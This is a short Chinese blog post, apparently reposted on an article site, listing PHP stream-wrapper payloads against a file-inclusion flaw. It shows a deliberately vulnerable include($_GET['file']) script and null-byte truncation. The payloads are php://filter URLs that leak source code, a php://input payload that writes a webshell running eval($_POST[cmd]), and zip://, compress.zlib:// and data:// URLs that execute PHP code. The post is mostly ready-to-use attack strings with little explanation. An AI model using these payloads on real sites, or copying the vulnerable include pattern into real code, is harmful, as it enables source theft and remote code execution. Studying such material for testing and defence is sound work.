美文网首页
php伪协议

php伪协议

作者: 唐小风7 | 来源:发表于2018-12-25 11:00 被阅读0次

    test.php

    <?php

include($_GET['file'])

?>

    情况一:不需要截断:

    test.php

    情况二:需要截断:

    <?php

include($_GET['file'].’.php’)

?>

    php<=5.2
    %00截断

    【file://协议】

    使用方法:

    file:// [文件的绝对路径和文件名]

    file://协议

    php://filter 读取源代码并进行base64编码输出,不然会直接当做php代码执行就看不到源代码内容了。

    localhost/test.php?file=php://filter/read=convert.base64-encode/resource=./test.php
    base64read

    php://input

    php://input 
    <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
    写shell

    【zip://协议】

    http://localhost/test.php?file=zip://D:/phpStudy/WWW/txf.zip%23txf.txt
    zip

    【bzip2://协议】

    http://localhost/test.php?file=compress.zlib://./txf.txt
    bzip2

    【data://协议】

    http://localhost/test.php?file=data://text/plain,<?php phpinfo()?>
http://localhost/test.php?file=data://text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
http://localhost/test.php?file=data:text/plain,<?php phpinfo()?>
http://localhost/test.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpPz4=
    data://协议 PHP封装协议

    相关文章

      网友评论

          本文标题:php伪协议

          本文链接:https://www.haomeiwen.com/subject/cfuxlqtx.html

          延伸阅读

          深度阅读

          • 您也可以注册成为美文阅读网的作者,发表您的原创作品、分享您的心情!

          栏目导航

          热点阅读

          关于我们|服务条款|联系我们|php伪协议|投稿指南|网站地图|RSS订阅|排版工具|手机版

          提供经典美文摘抄,优美散文欣赏,现代诗歌精选,短篇小说,心情随笔,表白情书范文,故事会在线阅读欣赏

          Copyright © 2014-2023 Haomeiwen.com All Rights Reserved. 好美文阅读网 版权所有

          备案信息:桂公网安备 45052102000051号 · 桂ICP备13007215号-3

          本站所收录作品、热点评论等信息部分来源互联网,目的只是为了系统归纳学习和传递资讯

          所有作品版权归原创作者所有,与本站立场无关,如不慎侵犯了你的权益,请联系我们告知,我们将做删除处理!